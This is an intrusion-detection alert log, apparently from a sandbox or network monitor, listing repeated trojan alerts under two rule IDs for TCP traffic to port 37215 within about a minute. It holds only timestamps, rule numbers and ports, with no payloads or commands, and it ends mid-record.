              Timestamp:05/24/24-10:59:10.693097
              SID:2835222
              Source Port:37714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804594
              SID:2829579
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574611
              SID:2835222
              Source Port:34288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545143
              SID:2835222
              Source Port:54544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097007
              SID:2829579
              Source Port:54300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287781
              SID:2829579
              Source Port:46338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204421
              SID:2835222
              Source Port:40120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516555
              SID:2829579
              Source Port:37422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332354
              SID:2835222
              Source Port:49690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576481
              SID:2829579
              Source Port:54578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531926
              SID:2835222
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552829
              SID:2829579
              Source Port:59682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535846
              SID:2829579
              Source Port:38900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201728
              SID:2835222
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536364
              SID:2829579
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382881
              SID:2835222
              Source Port:56204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817766
              SID:2835222
              Source Port:35186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928638
              SID:2835222
              Source Port:37798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397810
              SID:2829579
              Source Port:37900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067951
              SID:2829579
              Source Port:45922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639719
              SID:2835222
              Source Port:56500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578692
              SID:2835222
              Source Port:44468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879361
              SID:2835222
              Source Port:44560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071028
              SID:2829579
              Source Port:49868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188143
              SID:2835222
              Source Port:46208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533314
              SID:2829579
              Source Port:54042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579224
              SID:2829579
              Source Port:34622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585032
              SID:2835222
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625716
              SID:2829579
              Source Port:52656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859816
              SID:2829579
              Source Port:33476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099829
              SID:2829579
              Source Port:35786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120733
              SID:2829579
              Source Port:54242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873801
              SID:2829579
              Source Port:55352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269379
              SID:2835222
              Source Port:48106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928894
              SID:2829579
              Source Port:48566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111185
              SID:2829579
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309159
              SID:2835222
              Source Port:35080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636818
              SID:2829579
              Source Port:48664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536461
              SID:2835222
              Source Port:33146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490502
              SID:2835222
              Source Port:53870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110879
              SID:2835222
              Source Port:47762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485749
              SID:2835222
              Source Port:50258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871930
              SID:2829579
              Source Port:35322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727626
              SID:2829579
              Source Port:59628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245339
              SID:2829579
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768287
              SID:2835222
              Source Port:42226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253941
              SID:2835222
              Source Port:40674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991884
              SID:2829579
              Source Port:54250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727059
              SID:2835222
              Source Port:55406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078228
              SID:2835222
              Source Port:41560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425799
              SID:2835222
              Source Port:52752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858408
              SID:2829579
              Source Port:56000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280304
              SID:2829579
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833214
              SID:2829579
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478195
              SID:2829579
              Source Port:38562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726094
              SID:2829579
              Source Port:55622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536902
              SID:2829579
              Source Port:58050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830475
              SID:2829579
              Source Port:44960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096745
              SID:2835222
              Source Port:52322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636722
              SID:2835222
              Source Port:60584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123820
              SID:2829579
              Source Port:32988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.125088
              SID:2835222
              Source Port:46762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856975
              SID:2835222
              Source Port:57342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232473
              SID:2835222
              Source Port:32978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396755
              SID:2835222
              Source Port:60462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269355
              SID:2829579
              Source Port:59612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630631
              SID:2829579
              Source Port:51544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152958
              SID:2829579
              Source Port:35802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075426
              SID:2829579
              Source Port:60458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726797
              SID:2829579
              Source Port:40010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187547
              SID:2829579
              Source Port:41272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162268
              SID:2835222
              Source Port:46338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483106
              SID:2829579
              Source Port:45240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049042
              SID:2835222
              Source Port:59972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100873
              SID:2835222
              Source Port:52262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395132
              SID:2829579
              Source Port:39696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.459029
              SID:2829579
              Source Port:50298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055343
              SID:2829579
              Source Port:49384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576458
              SID:2829579
              Source Port:52996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245356
              SID:2835222
              Source Port:43062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725516
              SID:2829579
              Source Port:39526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770910
              SID:2835222
              Source Port:37342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098872
              SID:2835222
              Source Port:48586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926046
              SID:2835222
              Source Port:34370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411778
              SID:2835222
              Source Port:39186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279443
              SID:2829579
              Source Port:58846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280858
              SID:2829579
              Source Port:44626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123253
              SID:2835222
              Source Port:54090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591803
              SID:2835222
              Source Port:43906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799390
              SID:2829579
              Source Port:34000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878134
              SID:2835222
              Source Port:55484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195279
              SID:2829579
              Source Port:33956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372512
              SID:2829579
              Source Port:58950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394553
              SID:2835222
              Source Port:40120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551825
              SID:2829579
              Source Port:48562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623793
              SID:2835222
              Source Port:40112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547230
              SID:2835222
              Source Port:39666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100837
              SID:2829579
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108824
              SID:2829579
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530820
              SID:2835222
              Source Port:42154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395464
              SID:2835222
              Source Port:51616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245837
              SID:2835222
              Source Port:36328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360620
              SID:2829579
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537645
              SID:2829579
              Source Port:37144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098772
              SID:2829579
              Source Port:51414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245168
              SID:2829579
              Source Port:38358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477118
              SID:2829579
              Source Port:46054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078152
              SID:2835222
              Source Port:43086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112596
              SID:2835222
              Source Port:37008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064521
              SID:2829579
              Source Port:51216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480605
              SID:2835222
              Source Port:50278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601271
              SID:2835222
              Source Port:35524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707132
              SID:2835222
              Source Port:52482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053281
              SID:2835222
              Source Port:46684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251621
              SID:2829579
              Source Port:58154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726391
              SID:2829579
              Source Port:33782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279007
              SID:2835222
              Source Port:48130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446962
              SID:2829579
              Source Port:55628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880353
              SID:2829579
              Source Port:33750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432604
              SID:2835222
              Source Port:55830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507616
              SID:2835222
              Source Port:54642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099667
              SID:2829579
              Source Port:48190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866463
              SID:2835222
              Source Port:55588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705458
              SID:2835222
              Source Port:58450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120711
              SID:2835222
              Source Port:59180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681420
              SID:2829579
              Source Port:58914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662534
              SID:2829579
              Source Port:33620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526885
              SID:2835222
              Source Port:45060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097828
              SID:2829579
              Source Port:51146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532284
              SID:2835222
              Source Port:50642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535759
              SID:2829579
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582529
              SID:2835222
              Source Port:51896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279949
              SID:2829579
              Source Port:49610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763876
              SID:2829579
              Source Port:50348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188847
              SID:2835222
              Source Port:45204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187404
              SID:2835222
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519467
              SID:2829579
              Source Port:34806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979424
              SID:2835222
              Source Port:48420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235570
              SID:2829579
              Source Port:53598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377135
              SID:2829579
              Source Port:47874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099899
              SID:2835222
              Source Port:56328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661023
              SID:2829579
              Source Port:34818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664479
              SID:2835222
              Source Port:56806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280117
              SID:2835222
              Source Port:48806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.069006
              SID:2835222
              Source Port:55830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918218
              SID:2829579
              Source Port:46016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579644
              SID:2835222
              Source Port:50340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425859
              SID:2835222
              Source Port:59644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329680
              SID:2829579
              Source Port:40652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395495
              SID:2829579
              Source Port:40124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.877869
              SID:2829579
              Source Port:33374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726554
              SID:2829579
              Source Port:57260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368759
              SID:2829579
              Source Port:41282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534305
              SID:2829579
              Source Port:51596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.593864
              SID:2835222
              Source Port:51390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067330
              SID:2829579
              Source Port:38016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303865
              SID:2835222
              Source Port:48958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518957
              SID:2829579
              Source Port:60402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128738
              SID:2829579
              Source Port:47088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162296
              SID:2835222
              Source Port:60762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973625
              SID:2835222
              Source Port:53524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162402
              SID:2829579
              Source Port:43696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378122
              SID:2835222
              Source Port:43878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365278
              SID:2829579
              Source Port:43700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167323
              SID:2829579
              Source Port:58474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970660
              SID:2835222
              Source Port:41424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329768
              SID:2835222
              Source Port:34166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302874
              SID:2835222
              Source Port:56790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538150
              SID:2835222
              Source Port:59074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198784
              SID:2829579
              Source Port:41828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575325
              SID:2835222
              Source Port:47162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108636
              SID:2829579
              Source Port:33598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640675
              SID:2835222
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329724
              SID:2835222
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858930
              SID:2829579
              Source Port:59028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127519
              SID:2829579
              Source Port:43280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448027
              SID:2835222
              Source Port:49460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165575
              SID:2829579
              Source Port:38802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078731
              SID:2835222
              Source Port:58038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245759
              SID:2835222
              Source Port:41214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538092
              SID:2829579
              Source Port:54390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727939
              SID:2835222
              Source Port:34670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368407
              SID:2835222
              Source Port:41268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341404
              SID:2829579
              Source Port:41594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764519
              SID:2829579
              Source Port:43338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.275484
              SID:2829579
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485725
              SID:2835222
              Source Port:39564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076971
              SID:2829579
              Source Port:33876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979412
              SID:2835222
              Source Port:39494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078196
              SID:2835222
              Source Port:48608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431423
              SID:2829579
              Source Port:38568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.582012
              SID:2835222
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725683
              SID:2835222
              Source Port:59964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796193
              SID:2835222
              Source Port:43792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692537
              SID:2835222
              Source Port:36044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926351
              SID:2835222
              Source Port:34216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519552
              SID:2835222
              Source Port:38568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727035
